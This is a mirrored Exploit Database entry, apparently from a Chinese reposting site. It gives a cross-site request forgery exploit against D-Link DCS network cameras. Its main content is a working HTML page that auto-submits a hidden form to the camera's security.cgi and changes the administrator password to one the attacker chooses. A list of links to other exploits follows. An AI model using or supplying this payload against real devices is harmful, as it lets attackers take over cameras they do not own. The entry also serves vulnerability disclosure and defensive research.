D-Link DCS Series – Cross-Site Request Forgery (Change Admin Password)

Exploit Database
9 阅读

作者： rigan

日期： 2012-02-22
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/18509/

Title: Dlink DCS series CSRF Change Admin Password 
Version: DCS-900, DCS-2000, DCS-5300 and possibly other.
Date:2012-02-22
Author:rigan - imrigan [sobachka] gmail.com
--
Description:
Dlink DCS is a series of network cameras. These cameras use a web interface which is prone to CSRF vulnerabilities. This flaw allows to change the administrator password. 
--
Exploit:
<html>
<body onload="javascript:document.forms[0].submit()">
<form method="POST" name="form0" action="http://your_target/setup/security.cgi">
<input type="hidden" name="rootpass" value="your_pass"/>
<input type="hidden" name="confirm" value="your_pass"/>
</form>
</body>
</html>
--

last Exploits
D-Link DCS Series – Cross-Site Request Forgery (Change Admin Password)的更多信息

MyBB Profile Blogs Plugin 1.2 – Multiple Vulnerabilities：
Joomla! Component com_jem 2.1.4 – Multiple Vulnerabilities：
Responsive E-Learning System 1.0 – Stored Cross Site Scripting：
Scientific-Atlanta, Inc. DPR2320R2 – Multiple Cross-Site Request Forgery Vulnerabilities：
Seeddms 5.1.10 – Remote Command Execution (RCE) (Authenticated)：
Mambo Component AkoGallery – SQL Injection：
Joomla! Component com_otzivi – Blind SQL Injection：
MPS Box 0.1.8.0 – Arbitrary File Upload：